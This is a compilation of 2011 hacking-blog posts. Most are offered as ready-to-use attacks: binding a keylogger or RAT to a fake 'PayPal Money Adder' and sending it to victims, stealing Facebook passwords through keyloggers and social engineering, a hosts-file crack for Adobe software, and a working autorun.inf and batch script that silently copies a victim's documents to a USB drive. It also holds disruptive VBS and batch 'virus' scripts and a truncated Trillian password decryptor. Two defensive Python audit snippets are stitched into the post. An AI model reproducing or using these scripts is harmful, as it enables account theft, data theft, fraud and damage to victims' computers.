Monday, February 28, 2011

How to Hack PayPal Accounts using PayPal Hacking Software

In this article I will show you how to hack PayPal accounts using PayPal hacking software.
Note: Hacking credit cards or Bank accounts like PayPal is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.
This is fake PayPal Money Adder software to help you bind your keylogger or whatever Trojan server you have. This PayPal Money Adder software seems to be used to Add some Money to your PayPal Account, but actually this is fake PayPal Money Adder software used only as means for installing Trojan Server binded with it on victim computer.
PayPal Money Adder to bind your Trojan Server
1. Download link of Fake PayPal Money Adder is HERE
2. PayPal Money Adder is free fake application which appears to hack PayPal Accounts, now run .exe application to see something like this:

Note: PayPal Money Adder is a FAKE application. It doesn’t add any money to your PayPal Account. It is only used to fool victim and to bind your Trojan server.
3. When you open this, there is a TextBox to type your PayPal Email, and you have to select how much money you want to Add. After that, click on Send Money, and Progress Bar will start.
4. When the Progress Bar is full, it will say “Money Has Been Added to your Account Successfully” as in the picture below, but it won’t add any money to your account!!!

5. So that is one fake PayPal Money Adder, not one real !!!
6. Now create a keylogger or whatever server (like stealer or RAT), crypt it, and bind with this application. You can use Shock Labs File Binder or Easy Binder. You can find some binders on this blog, just search for it !!!
7. Now, send this binded PayPal Money Adder to your victim and tell him this PayPal Money Adder is used to Add Money to PayPal Accounts. You can use Social Engineering for this. So as long as he runs PayPal Money Adder on his computer, your keylogger server is installed on his computer.
8. Many other Fake Hacking Tools are coming soon, like AlertPay Money Adder, Skype Money Adder, Ultimate Password Cracker, Neobux Hacker and other!!!

Bypassing Facebook Security to Hack Facebook Account Passwords

Ok, here’s a new quick tutorial for everyone who has been having to deal with Facebook blocking your entrance into someone’s account due to logging in from a different location.
Ever since I began constantly having to deal with Facebook leaving me out of people’s accounts, I have thought that I should write up my experiences to help others.
I will go over specific techniques and ideas to eventually grant you entrance to their accounts without having to deal with that Facebook problem having logging in from different location.
1. Before you even begin reading this, you must already have their passwords or e-mails. If not, I will tell you a few ideas of how to acquire them.
If you only want to log in without changing passwords, I would suggest that you steal their passwords through Phishing, Keylogging, or Social Engineering.
2. Bypassing Facebook security can be done through black hat methods, however I will not go over those methods, instead I will be touching the social engineering methods which are more effective and you can get faster results.
3. You will need to use your brain to think and have patience. If you don’t have either a brain to think or the patience to wait, please don’t continue reading this tutorial because you will not get any success.
Ok, let’s move on to the actual information.
-This method is a cheap shot method, but you never know if it might work or not.
1. If a person uses a particular computer to log in to their accounts on a regular basis, THAT computer alone should be your focus.
You should infect that computer with a keylogger and have it linked together with a FTP to send you the logs or linked to send you e-mails.
2. Another method is to use your OWN computer to acquire the password by infecting yourself with a keylogger and let the slave use your computer. Gain their trust to the point of where they can log in to different websites.
You can say for instance “My account is not working, I think Facebook banned me. Can you test your account to see if yours is working?”
And of course, they will log in and you will gain the information. After they successfully log in, you can login to your account and say “Oh, there we go! It worked”
Now, you will attempt to log in in the future and the problem of Logging in from another location will disappear.
3. Let’s say that they aren’t stupid enough to use your computer to log in, you might think, what then? Well, here’s my next suggestion to you.
Considering that you will already have the password through the methods I mentioned earlier, but you will have the problem of Logging in from another location.
Here’s what you do:
Watch and study your slave, if you know he/she uses a location to use a computer, you should attempt to log in at that same location as well. It could be school, library, another friend’s house, etc…
Most people will use any computer to log in to Social Networks or E-mails to check on updates. Considering that the IP you log in at that particular is the same within their network, the problem of Logging in from another location will not come up.
4. So, you don’t have the choice of either offering your computer as a trap or the chance to “stalk” your slave. You wonder, what do I do then?
Well, this is where it gets more tricky considering that Facebook finally came up with an ingenious method to avoid intruders of taking over accounts easily.
Here’s what Facebook did, in case if you don’t already know. Facebook implemented a feature where you must visually recognize the friends on that account. They will show you pictures of random people within that account and ask you to select the name of that person.

If you don’t recognize any of those people, you’re screwed.
When will this happen? That will only happen when you attempt to change their passwords, so Facebook makes sure that you do in fact own that account. I personally wouldn’t attempt to change the passwords, but if you do try, here’s what I would recommend to you.
-If you know the person in person, notice who he/she is friends with to try to recognize the faces and physically ask the other persons their names.
If you do not know the person, you can use websites like:
To search their names, e-mails, phone numbers to see whether if you can find them on other Social networks. You can search the person’s name manually by going to Myspace, Facebook, etc…To see who they have added as friends.
Your next step will be to add a friend of the slave or the slave directly. Adding the slave directly would probably be the best plan because you would have access directly to all the victims’ friends and their pictures.
Now, all you have to do is match the pictures that Facebook asks you when you attempt to change their passwords by going to the victims friends and match them.
If you don’t want to change their passwords, you can mask the slave’s IP using other methods in which I will not go over. To find out their IP, you will need a RAT to manually whois them or any other method other there to find their IP.
A quick method I will suggest to you is to send the slave an e-mail if they have a hotmail account. When they reply you can right click on the e-mail and view source. You will see an IP from sender and use that to mask.
Mask their IP and facebook will not give you the problem of Logging in from another location.
If you follow the suggestions I have given you, you will surely gain entrance to their accounts and Facebook won’t be able to do crap.
Their security is strong, but good ol’ Social engineering never fails.
Do you have questions, comments, or suggestions? Feel free to post a comment!

Search Engine for Hackers

A new search engine has been introduced called “SHODAN” that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners.
Web search engines, such as Google and Bing, are great for finding websites. But what if you’re interested in finding computers running a certain piece of software (such as Apache)? Or if you want to know which version of Microsoft IIS is the most popular? Or you want to see how many anonymous FTP servers there are? Maybe a new vulnerability came out and you want to see how many hosts it could infect? Traditional web search engines don’t let you answer those questions.
The following filters can be used in a search:
  • country: 2-letter country code
  • hostname: full or partial host name
  • net: IP range using CIDR notation (ex: 18.7.7.0/24 )
  • port: 21, 22, 23 or 80
As we [some of us] can understand, it is very easy to find vulnerable hosts just by looking at the banner responses shown by SHODAN. This could turn out to be a huge threat, as many skiddies could be scanning hosts anonymously round the clock for a particular exploit or something else that they understand well.

The Best Operating System for Hackers

There are a couple of things that are essential to any hacker’s walk of life. To name a few, there’s the ubiquitous flash drive for data transfer. You have the crossover cable for even faster data transfer. There’s the Wi-Fi antenna for high gain and strong amplification. Possibly, you might find a video capture card in the computer. Of course, there’s the ubiquitous laptop and desktop computer. But what software is on these computers? Undoubtedly, you will find at least two operating systems, most often Windows and Linux. But with Linux, there are several different distributions. Is there a specific one? With hackers and crackers, there is only one Linux distro out there. It is called Backtrack.

BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking.
Regardless if you’re making BackTrack your primary operating system, booting from a Live DVD, or using your favourite thumb drive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.
BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tool collection to-date.
BackTrack is quite possibly the most comprehensive Linux distribution of security tools. Both hackers and crackers can appreciate the features of this distribution. For black-hatters, it is easy access to software that facilitates exploitation of secure systems. For white-hatters, it is a penetration tester that finds holes in a security scheme. See, everybody wins!
Major Features
BackTrack features the latest in security penetration software. The current Linux kernel is patched so that special driver installation is unnecessary for attacks. For example, an Atheros-based wireless networking adapter will not enter monitor mode or inject packets without the MadWiFi driver patch. With BackTrack, you don’t need to worry about that. It’s just plug-and-play ready-to-go!
What’s great is that this Linux distribution comes Live-on-CD. So, no installation is needed. However, once you experience BackTrack, you will realize that it is a must to download this operating system and install it on your laptop. At the very least, download the VMWare Virtual Appliance for BackTrack. Make sure you also install the VMWare Tools for Linux. Many features will still work in VMWare mode.
  • Based on: Debian, Ubuntu
  • Origin: Switzerland
  • Architecture: i386
  • Desktop: Fluxbox, KDE
  • Category: Forensics, Rescue, Live Medium
  • Cost: Free
Tools:
BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.
BackTrack includes many well known security tools including:
  • Metasploit integration
  • RFMON Injection capable wireless drivers
  • Kismet
  • Nmap
  • Ettercap
  • Wireshark (formerly known as Ethereal)
  • BeEF (Browser Exploitation Framework)
It also includes a large collection of exploits as well as more commonplace software such as browsers. BackTrack arranges tools into 11 categories:
  • Information Gathering
  • Network Mapping
  • Vulnerability Identification
  • Web Application Analysis
  • Radio Network Analysis (802.11, Bluetooth, Rfid)
  • Penetration (Exploit & Social Engineering Toolkit)
  • Privilege Escalation
  • Maintaining Access
  • Digital Forensics
  • Reverse Engineering
  • Voice Over IP

Lock Your Windows 7 PC with a Transparent Screen Over

I don’t know why you might need this, but it’s definitely better than using the logon screen (Windows key + L). In fact, you can see what’s happening behind the lock even while your desktop screen is locked.
ClearLock is a transparent screen locker aimed at making the computer tech/system admin’s life easier by providing a way to disable input to a computer while still allowing you to see what is going on. It is completely portable and can be run in a PE environment or on a live system without leaving anything behind.
ClearLock is not a security system. Its purpose is to keep meddling users from screwing with the computer when you are fixing it. It will not keep your computer/data safe from someone who is determined to get at it.

WinMate: Free System Optimizer for Slow PC Problems in Windows

One way to improve computer performance and speed of your PC is now easy! You can probably start with inadequate Windows settings which shouldn’t be ignored. Otherwise, the configuration errors can cause your computer into a draggy mess.

T55 WinMate : Free System Tweaker, Optimizer for Windows

WinMate is a free program that uses the latest technology to scan your computer and find all errors. After that, it gives you confidence solutions. In addition, WinMate also offers a wide range of great value and security software for computer optimization. With the upscale features, you can stay away from potential threats and clean the system errors to reduce accidents equipment, freezing and blue screen.
The program scans for various factors that determine slowdowns and system crashes. These include update checks, error registry entries, invalid files, Internet Explorer risk elements and improper system settings. Next, it gives a mark for the computer. Features and benefits:
T55 WinMate can identify computer potential risk by one-click scan. It scans all types of factors which slowdown your computer and cause constant system crashes. The scan contents are error registry entries, Windows update check, invalid files, improper system setting, IE risk item and more. Finally, T55 WinMate will give your computer a mark.

Fix slow computer

Do you have trouble speeding up your computer? Do you want to avoid system crashes? WinMate provides four classic and effective methods to tune your computer with only a few clicks.
  • Automatically Scan registry and repair the error items WinMate detect for you.
  • Scans and fixes your Windows system errors, protect your Windows system from crashing, freezing and blue screen problem. Register DLL & File Association & Duplicate files scan & Invalid file remove.
  • WinMate checks up your hard disk and find the fragments which prevents computer from running smoothly. Disk defragment rearranges and physically organizes the contents on your Hard Disk to fix slow computer.
  • Memory Tweak utility recover the memory to free up it.
It makes your PC run faster without causing any instability of your system.

Fix slow Startup

Do you notice your computer is no longer as fast as before? By cleaning up startup programs and disabling services, you can recover the optimum boot time. T55 WinMate lists all the startup items and services in detail. You can safely remove them in several steps with our recommendations.

IE Tools

IE Tools comprises a host of rich built-in utilities to guarantee a better and healthier environment of your IE browser. Plugin Manager is a professional toolkit to help you remove malicious plugins which slow your computer. IE Restore: IE Restore utility allows to restore all the original settings of your IE. Check up your LSP to ensure better performance of your Internet Explorer.

System Tools

T55 WinMate provides users with a batch of useful tools such as File Wiper, Drive Immuner, Program Uninstall and so on. You can gain convenience from General Tool.

Computer Security Protect

T55 WinMate runs a series of Protection measures to keep your computer from risk. Disk immune disable AutoRun function. It effectively prevent virus from attacking. Timely download Windows updates and fix vulnerabilities. Clean up all IE history traces including cache, password and cookie. So that your Online bank info and personal privacy will not be used by spyware publisher.

Easy to use and free for ever

User-friendly Interface and step-by-step guide make it easy to use. Start Your Scan Now! You neither receive AD pop ups nor additional stuff. Your privacy will be protected and your email is never published nor shared.

Get Detailed Data Analysis Report of Your Facebook Friends, Activity

Facebook Spectrum is a free online application utilizing Facebook APIs and social graph to provide you a birds eye view of all your friends on facebook. You will need to be logged in to Facebook to access this application.
In the timeline section, we see all the status updates and Wall talks, both our own and any of our friends. This part is mainly intended to discover in a moment or suspicious activity that went unnoticed.
A useful section is that of the birthday, which shows a calendar with birthdays all highlighted, and a list of who and how many meet each month. With Geolocation, we can see in Google Maps the location of all our friends, no matter what city or area they are in.
A very good section is devoted to photos, where you can see who has a large number of albums and photos, with easy access to viewing the albums of any friend and a pie chart showing the top 10 of your friends with the most albums.
Finally, we know what gender, male or female or other, is prevalent among our community, and to discover what things we like mutually among our friends.

Saturday, February 26, 2011

Crack Adobe Products With Notepad

This very short tutorial or tip that will show you how to hack photoshop or any other adobe software, you will need a serial key that is generated through a keygen or http://www.serials.ws/ when installing, next go to:
C:\Windows\System32\drivers\etc
Do this before installation!
Find a file named “hosts”, right click it and “edit” paste this text completely:
# Copyright © 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a “#” symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
#
127.0.0.1 localhost
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 ereg.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 wip3.adobe.com
127.0.0.1 3dns-3.adobe.com

127.0.0.1 3dns-2.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 ereg.wip3.adobe.com
127.0.0.1 activate-sea.adobe.com
127.0.0.1 pagead2.googlesyndication.com
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 activate-sjc0.adobe.com

What to do if the “hosts” file is invisible:
* Go to folder options in the control panel and then view hidden folders
Note:-
NEVER register the product or you will most certainly get blocked
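
Seen from the defender's side, the edit above is a recognisable tamper pattern: real vendor hostnames pinned to 127.0.0.1 so that licensing or update checks never leave the machine, which is also how malware cuts a host off from security updates. The Python audit below is an added example, not part of the original post; the function names, the `watch_suffixes` parameter and the sample file contents are assumptions made for illustration.

```python
import ipaddress

# Names that legitimately resolve to the local machine.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"}

# Constructed sample: a few entries of the kind shown above, mixed with
# legitimate lines, so the audit has something to separate.
SAMPLE_HOSTS = """\
# sample HOSTS file (constructed for this example)
127.0.0.1 localhost
::1 localhost
127.0.0.1 activate.adobe.com
127.0.0.1 ereg.adobe.com   # inline comment
0.0.0.0 pagead2.googlesyndication.com
192.168.1.20 fileserver.corp.example
127.0.0.1 devbox
"""


def parse_hosts(text):
    """Yield (line_no, ip, [hostnames]) for each valid mapping line."""
    for line_no, raw in enumerate(text.splitlines(), start=1):
        entry = raw.split("#", 1)[0].strip()  # drop full-line and inline comments
        if not entry:
            continue
        fields = entry.split()
        if len(fields) < 2:
            continue  # an address with no hostname maps nothing
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # malformed address field
        yield line_no, ip, [h.lower().rstrip(".") for h in fields[1:]]


def is_sinkhole(ip):
    """True for loopback (127.0.0.0/8, ::1) and unspecified (0.0.0.0, ::)."""
    return ip.is_loopback or ip.is_unspecified


def audit_hosts(text, watch_suffixes=()):
    """Return findings for public-looking hostnames pinned to a sinkhole address.

    watch_suffixes: domain suffixes (for example a vendor's licensing or
    update domain) whose presence should be treated as high priority.
    """
    findings = []
    for line_no, ip, names in parse_hosts(text):
        if not is_sinkhole(ip):
            continue
        for name in names:
            if name in LOCAL_NAMES or "." not in name:
                continue  # localhost aliases and bare machine names
            watched = any(name == s or name.endswith("." + s) for s in watch_suffixes)
            findings.append(
                {"line": line_no, "ip": str(ip), "host": name, "watched": watched}
            )
    return findings


if __name__ == "__main__":
    for f in audit_hosts(SAMPLE_HOSTS, watch_suffixes=("adobe.com",)):
        level = "HIGH" if f["watched"] else "info"
        print(f"[{level}] line {f['line']}: {f['host']} -> {f['ip']}")
```

Ad-blocking hosts lists also sinkhole advertising domains, so findings outside the watch list are informational; on Windows the file to feed in is the `hosts` file in the directory named above.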

You May Use These Black Listed Keys

How to Steal people files using usb drive

I am going to teach you how you can do this from batch file with the help of autorun.inf file.
Let me tell you the basic things what will happen.

When you plug in your pen drive, the system will look for autorun.inf (in case autorun is not disabled for your drive on the system).

Then we’ll input some command in autorun.inf in such a way that it will load the batch file that does the magic of copying all the files from your PC. In this demonstration I am copying only the files and folders in My Documents.

Here goes the batch code:

@echo off
:CHECK
if not exist "%homedrive%\Copied_files" md "%homedrive%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR

:COPIER
if not exist "%homedrive%\Copied_files\%computername%" md "%homedrive%\Copied_files\%computername%"
if not exist "%homedrive%\Copied_files\%computername%\VIDEOS" md "%homedrive%\Copied_files\%computername%\VIDEOS"
if not exist "%homedrive%\Copied_files\%computername%\PICTURES" md "%homedrive%\Copied_files\%computername%\PICTURES"
if not exist "%homedrive%\Copied_files\%computername%\MUSIC" md "%homedrive%\Copied_files\%computername%\MUSIC"
if not exist "%homedrive%\Copied_files\%computername%\DOWNLOADS" md "%homedrive%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%homedrive%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%homedrive%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%homedrive%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%homedrive%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%homedrive%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit

:ERROR
exit

What it actually does is in first case ,CHECK it checks if your removable storage have Copied_files folder or not. If it doesn’t have then it creates one by using MD (Make Directory) command.

Again it checks if you have documents and settings folder then it will assume that you are using windows XP. Other wise it will return an error and exits.

This happens because; in Windows XP the user’s documents are usually stored in %systemroot%\Documents and Settings folder.

Now I’ve defined another two cases after the first case CHECK, that is COPIER case and ERROR case.

Case COPIER will execute when the program recognizes it is Windows XP, where the real copying work goes on.

Case ERROR will execute when the Documents and Settings doesn’t exists in your system root.

This is just a simple use of Batch programming. Copy the above code and paste it in notepad and save it as Filename.bat.

Now let’s create a file that will load it automatically.

[autorun]
Open=Filename.bat
Action=File Copier

The above code goes in the autorun.inf file. Open Notepad, paste it in, and save it as autorun.inf.

Copy the two files, autorun.inf and Filename.bat in your flash drive.

Then plug in your device to your friends PC and do the evil things.

Where is the flaw?

It shows Command prompt window and process of copying (thank god your noob never think that it actually copying).

Another thing is that it determines the Windows version by searching for the Documents and Settings folder, which is not the right way to determine the operating system.

However this is just an educational tutorial.

Hope this tutorial was helpful.
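
The whole technique depends on two things a defender can check: whether AutoRun is still enabled for removable drives, and whether a drive's autorun.inf launches a program. The Python audit below is an added example, not part of the original post; the function names and the sample file contents are assumptions, and the registry value it interprets is `NoDriveTypeAutoRun` under `Software\Microsoft\Windows\CurrentVersion\Policies\Explorer`.

```python
import re

# Keys in the [autorun] section that cause something to be launched.
LAUNCH_KEYS = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$")
# Extensions that run code when launched from the drive.
RISKY_EXT = (".bat", ".cmd", ".vbs", ".js", ".exe", ".scr", ".com", ".pif", ".lnk")

# The autorun.inf shown above, reproduced as sample input.
SAMPLE_AUTORUN = """\
[autorun]
Open=Filename.bat
Action=File Copier
"""

# Constructed sample: quoted path with arguments, plus a document target.
SAMPLE_QUOTED = r'''[AutoRun]
shell\open\command="tools\run me.exe" /q
shellexecute=readme.html
'''


def parse_autorun(text):
    """Return {lower-cased key: value} for the [autorun] section only."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def target_of(command):
    """First token of a launch command, honouring a quoted path."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end != -1 else command[1:]
    return command.split()[0] if command else ""


def audit_autorun(text):
    """List every launch entry and mark those that start a script or binary."""
    findings = []
    for key, value in parse_autorun(text).items():
        if not LAUNCH_KEYS.match(key):
            continue  # label=, icon=, action= and similar do not launch anything
        target = target_of(value)
        findings.append(
            {"key": key, "target": target, "risky": target.lower().endswith(RISKY_EXT)}
        )
    return findings


def removable_autorun_disabled(no_drive_type_autorun):
    """Interpret the NoDriveTypeAutoRun bitmask.

    Bit 0x04 disables AutoRun on removable drives; 0xFF disables it on
    every drive type.
    """
    return bool(no_drive_type_autorun & 0x04)


if __name__ == "__main__":
    for f in audit_autorun(SAMPLE_AUTORUN):
        flag = "RISKY" if f["risky"] else "ok"
        print(f"[{flag}] {f['key']} -> {f['target']}")
    print("removable AutoRun disabled with 0xFF:", removable_autorun_disabled(0xFF))
```

Setting `NoDriveTypeAutoRun` to 0xFF by policy removes the trigger regardless of what the drive contains; the file audit is for triaging media that has already been collected.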

How To Hack Your Facebook Account with Greasemonkey & Javascript


Facebook is pretty awesome, but it is far from perfect. More than once, I’ve heard complaints about some of Facebook’s technical aspects. Sadly, Facebook isn’t open-sourced, so users can’t change anything themselves – or can they?
By using simple pieces of Javascript code, or by applying Firefox Greasemonkey userscripts, users can change the appearance and workings of Facebook themselves.
Learn how to hack Facebook accounts for fun, or tweak something useful. Believe me, it really is all in your hands.

Facebook Account Javascript Hacks

In these following hacks we’ll be using basic Javascript to toy around with Facebook. Note that we’re not going to hack into Facebook accounts, or anything of the like. Most of these ‘hacks’ are temporary and will disappear once you refresh the page. They also won’t be visible to users on other computers. So why are we doing it? – Because it’s fun!
These Javascript snippets, which we’ll supply below, simply need to be pasted into the address bar. Hit enter, et voila!

Changing Profile Colour

This will change the colour of your Facebook bar to a color of choice.
Just paste the following code in your address bar and hit enter. You can replace ‘red’ with any color you want – black, white, green or even orange. If you want to reverse the effect, press Ctrl+F5 for a hard reload of the page.
javascript:void(document.getElementById('fb_menubar').style.background='red');

View Chat History with Offline Friends

Unfortunately, you can’t normally view the chat history of offline friends. If you’re trying to remember something that was said, waiting for them to come back online is one hell of a bother. Instead, you can just use this – pretty useful – Javascript hack.
First of all, we need to get your friend’s Facebook ID. When you visit his page indirectly (through your friends list or by using the search engine), you’ll be able to see it as a number in the address bar.
Another way to retrieve someone’s ID is by going to the Friends widget on their page, and right-clicking See All. Then you’ll have to copy the link location and paste it in your address bar.
Once you’ve got someone’s ID, simply paste the following code in your address bar, replacing 1122334455 with the relevant number.
javascript:buddyList.itemOnClick(1122334455);

Other Javascript hacks

The preceding two hacks are without doubt the most impressive or useful ones. Below are some of the other tricks you can pull off by using Javascript. We’re not going too deep on these because they’re all things you can do manually as well.
Change chat status to invisible:
javascript:statusControl.sendVisibility(false);
Change chat status to visible:
javascript:statusControl.sendVisibility(true);
Close all chat windows with person 1122334455:
javascript:chatDisplay.tabs[1122334455].tabXOnClick();
Open application tab:
javascript:applicationDock.toggleTab();
Bring up notifications:
javascript:presence.toggleTab('chat_status_control','chat_status_control_tab');
Bring up friends list:
javascript:buddyList.toggleTab();

Facebook Greasemonkey Hacks

Greasemonkey is one of the best firefox add-ons in existence. By using ‘userscripts’, you can customize nearly every website. Read more about Greasemonkey in .
Today we won’t be focusing too hard on Greasemonkey itself, but on some of the great Facebook-specific userscripts.
Facebook Auto-login – One of the simplest, but perhaps also one of the most useful userscripts you’ll find. This one will automatically log into Facebook, as long as Firefox remembers your password, saving you a lot of hassle.
Auto-Colorizer for Facebook – This script will recolor your Facebook page by applying the color scheme of the most dominant picture currently showing on the page. As you can imagine, this can create some exciting, and also ambient effects.
FacebookDeletes – If you want to get rid of a lot of people at once, this is your man. This script can bulk delete friends, making the massacre all the easier.
Remove All Facebook Ads – Adblock still tends to miss a lot of Facebook ads. This script, frequently updated, will remove all thinkable Facebook ads, creating a completely click-safe Facebook environment.
External Apps Blocker – One of the most irritating things on Facebook are the abundance of quizzes, quote generators, and the like. Filtering all external app ‘stories’ from your homepage will be a lot easier if you use this script.
Want some more? Userscripts hosts 1112 Facebook related userscripts at the time of writing. Check it out and have a blast!
If you know any other cool Javascript tweaks, or Greasemonkey hacks, feel free to mention them in the comments section below!

10 Virus Notepad Script

All of these commands are typed into Notepad.
1)Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

2) Toggle your friend's Caps Lock button simultaneously:
Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

3) Convey your friend a lil' message and shut down his / her computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:
Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.

10) THRETEN BY MAKING SCREEN FLASH

To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a

To stop these scripts, open Task Manager (Ctrl+Shift+Esc) and end the wscript.exe process.
Enjoy!!!^^

Hack Passwords using Limewire…

1. Download LimeWire and install it (Reboot computer if needed)
The newest verion of LimeWire is here:
Code:
http://www.limewire.com/download/index.php
2. Open “Notepad”
3. Copy and Paste the following code into Notepad
Dim key, keys, pwd, pwds, pwdl, maxval, goods, x
key = “243,038,129,196,057,134,219,146,113,163,185,230,0 83,122,149,” & _
“124,000,000,000,000,000,000,255,000,000,128,000,0 00,000,128,” & _
“128,000,255,000,000,000,128,000,128,000,128,128,0 00,000,000,” & _
“128,255,000,128,000,255,000,128,128,128,000,085,1 10,097,098,” & _
“108,101,032,116,111,032,114,101,115,111,108,118,1 01,032,072,” & _
“084,084,080,032,112,114,111,120,000″
keys = split(key, “,”)
main()
sub main()
pwd = “”
pwd = inputbox(“Enter the Encrypted Trillian Password”, “”, “”)
if pwd = “” then exit sub
pwd = trim(pwd)
pwdl = len(pwd)/2
